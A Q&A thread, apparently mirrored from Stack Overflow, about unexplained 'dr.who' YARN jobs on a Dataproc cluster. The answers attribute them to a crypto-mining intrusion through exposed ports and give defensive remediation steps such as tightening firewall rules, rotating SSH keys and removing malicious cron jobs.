可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效，请关闭广告屏蔽插件后再试):

问题:

After a dataproc cluster is created, many jobs are submitted automatically to ResourceManager by user dr.who. This is starving the resources of the cluster and eventually overwhelms the cluster so.

There is little to no information in the logs.

Is anyone else experiencing this issue in dataproc?

回答1:

Without knowing more, here is what I suspect is going on.

It sounds like your cluster has been compromised
Your firewall (network) rules are likely open, allowing any traffic into the cluster
Someone has discovered your cluster is open to the public internet and is taking advantage of it

I recommend you do the following immediately:

Secure the firewall rules you're using to prevent outside access; do not open ports to the public internet
If you are not using your Cloud Dataproc cluster(s), delete them
If you had any jobs or data on that cluster, you should consider that data as potentially compromised (as anyone could access the cluster)

If you need to access WebUIs on the cluster, you should use a SOCKS proxy and SSH.

回答2:

What is probably hapenning to you:

the hacker scans every open vulnerability (IP address + port) and stores them to a breach table
the hacker scans the breach table and tries to figure out whether you launched or not a cluster recently
when a vulnerable cluster is available, the hacker connects to it (everything is open and a vulnerability has been found!)
the guy connects to your cluster, removes everything (in my case, the script is named zz.sh and you can find it in the BitBucket link below) then downloads the mining app
YARN thinks that workers are failing but I don't even think that a Hadoop application is running anymore.

I suggest you try to find a bitbucket/github address in your error logs. Also you can try to look for a get/wget/apt-get/curl command.

I guess he's rich now.

Two important things:

check that your security group configuration is strong enough, without public authorizations everywhere
check that your SSH key is not compromised.

What you need to do:

The idea is to block unecessary open ports with an updated security group policy and use a VPC if needed. I will describe the first option with main steps to follow.

[OPTIONAL] change your SSH keys (caution: this can easily break things in your system, to do carefully)
go to your EC2 screen > Network and security > Security groups

Create a new security group and configure possible connections only from a master and its nodes (you can setup an input connection to be from a given security group).
use the security group described in (3) when launching a new EC2/EMR instance. (it should appear when checking the cluster security configuration)

Related:

yarn-dr-who-application-attempt-fail
how-to-use-the-resourcemanager-web-interface-as-an-user
hdp-261-virus-crytalminer-drwho.html

回答3:

The virus is a cryptocurrency miner that creates thousands of dr. who jobs like what you describe. The jobs are there to "reinstall" the crypto miner if you try to remove it. Here is how to remove the miner permanently.

Check for cron jobs as yarn on each node that are suspicious and remove them.